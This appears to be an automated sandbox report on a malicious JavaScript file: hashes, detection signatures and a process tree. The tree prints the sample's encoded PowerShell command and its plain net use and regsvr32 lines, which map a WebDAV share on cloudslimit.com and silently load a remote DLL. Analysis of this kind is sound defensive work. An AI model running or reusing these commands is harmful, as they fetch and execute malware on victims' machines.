Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
4a207e0688b62fcbc1399f15e4da06c0fdfc60c12bdccc133e035574890f7ec3.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4a207e0688b62fcbc1399f15e4da06c0fdfc60c12bdccc133e035574890f7ec3.js
Resource
win10v2004-20240802-en
General
-
Target
4a207e0688b62fcbc1399f15e4da06c0fdfc60c12bdccc133e035574890f7ec3.js
-
Size
12KB
-
MD5
0aeee8738a476deb8b7f84059ac5df70
-
SHA1
9822d4d33df8b719bde23e0b6b2b6c44564fc9db
-
SHA256
4a207e0688b62fcbc1399f15e4da06c0fdfc60c12bdccc133e035574890f7ec3
-
SHA512
1b17d706bddefc918614afad4234e743c60df13de1133f001443a31cf4cec54de650117fd298d2ca03c55136789623456f86a9f15d362d50af446c70bce531a5
-
SSDEEP
96:/K+VNmAmU4ekN+f424+i4/DFWPU646r4AbsDc4Gwwrr4z8Im:/KmsAHBTfjUgDFWs6ZrrbsYBvr+85
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2344 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3020 wrote to memory of 2344 3020 wscript.exe 31 PID 3020 wrote to memory of 2344 3020 wscript.exe 31 PID 3020 wrote to memory of 2344 3020 wscript.exe 31 PID 2344 wrote to memory of 2204 2344 powershell.exe 33 PID 2344 wrote to memory of 2204 2344 powershell.exe 33 PID 2344 wrote to memory of 2204 2344 powershell.exe 33 PID 2344 wrote to memory of 2776 2344 powershell.exe 34 PID 2344 wrote to memory of 2776 2344 powershell.exe 34 PID 2344 wrote to memory of 2776 2344 powershell.exe 34 PID 2344 wrote to memory of 2776 2344 powershell.exe 34 PID 2344 wrote to memory of 2776 2344 powershell.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4a207e0688b62fcbc1399f15e4da06c0fdfc60c12bdccc133e035574890f7ec3.js1⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADQANgAwADkAMwAwADcAMwAzADIAOAA5ADYAMQAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2204
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\246093073328961.dll3⤵PID:2776
-
-